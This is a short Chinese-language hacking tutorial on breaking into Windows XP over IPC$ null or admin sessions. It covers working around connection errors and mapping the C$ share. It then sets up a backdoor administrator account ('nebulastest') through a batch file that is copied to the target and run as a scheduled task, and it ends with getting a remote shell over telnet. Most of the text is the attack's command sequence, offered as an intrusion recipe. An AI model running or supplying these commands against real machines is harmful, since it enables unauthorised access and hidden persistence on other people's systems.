功建立IPC$入侵windowsXP

( 测试环境 ：主机（ windows XP sp3 ）与 windows XP sp2 虚拟机 )

       通过 IPC$ 与 windowsXP 建立连接，在现在的绝大多数的 XP 操作系统中总是会出现问题。以下如何解决在建立 IPC$ 出现的一系列问题。 IPC$(Internet process connection), 通常很多的机子的默认共享都是打开的！在 cmd 下使用 net share 命令是不是发现有很多 $ ， “ipc$ admin$ ， c$ ， d$.....” （很危险啊，在下章我将讲述如何完全关闭自己的系统默认共享）。

现在进入正题：

1.net use \\ 目标 IP\ipc$

出现 53 错误：找不到网络路径，（目标主机打开了系统防火墙或者其他防火墙软件，解决：关闭目标防火墙）

出现 1326 错误：

1 ） net use \\ 目标 IP\ipc$ "" /user:"administrator" 进行连接，报告系统发生 1326 错误，登陆失败：未知用户名或密码错误。检查一下我们的命令是否错误或者用户名错误。结果发现无错。

2 ）在远程机的 " 控制面板 - 文件夹选项 - 查看 - 简单的文件共享 ", 去掉选取 , 然后再尝试连接。简单文件共享会
把网络连接权限都归为 guest 连接，是无法访问 IPC$ 等管理共享的 . 结果发现时这个错误，纠正。

紧接着可能出现 1327 错误：登陆失败：用户帐户限制。可能的原因包括不允许空密码，登陆时间限制，或强制的策略限。 " 在远程机的 " 控制面板－管理工具－本地安全策略－安全选项－用户权限 " 指派里，禁用 " 空密码用户只能进行控制台登陆 ".

映射对方默认共享 c 盘： net use z: \\ 目标 IP\c$

建立 ipc$ 告一段落，删除 ipc$ 连接： net sue \\ 目标 IP\ipc$ /del

在次基础上在目标电脑上留下后门账号：

编写一个批处理文件，并拷贝到对方的电脑上，然后增加计划任务执行批处理文件；

批处理命令：（保存为 adduser.bat ）

net user nebulastest 123456 /add      // 增加用户 nebulastest ，密码 123456
net localgroup administrators nebulastest /add     // 为用户 nebulastest 赋予管理员权限

然后在本机上执行命令（已经建立 IPC$ 连接）： copy adduser.bat \\ 目标 IP\c$

接着查看目标电脑时间 :net time \\ 目标 IP

随后为目标电脑增加计划任务： at \\ 目标 IP 执行时间 c:\adduser.bat

在完成以上工作后删除当前 IPC$ 链接，使用新用户和新密码建立 IPC$ 链接，以测试时候建立账号成功。

net use \\ 目标 IP\ipc$ "123456" /user:"nebulastest"

使用 telnet 进行登陆：（前提 : 目标电脑已经开启 telnet 服务）

双击 “telnet 服务 ”----- 选择 “ 自动 ”----- 点击 “ 启动 ”

在命令行输入： telnet 目标 IP

之后弹出远程登录对话框, 选择 Y, 输入用户名（后门账户，密码）

输入密码不会现在但是回车后会自动验证是否密码正确

下图：已经输入密码但是不会显示

登陆后的界面：

大功告成，获得目标主机 shell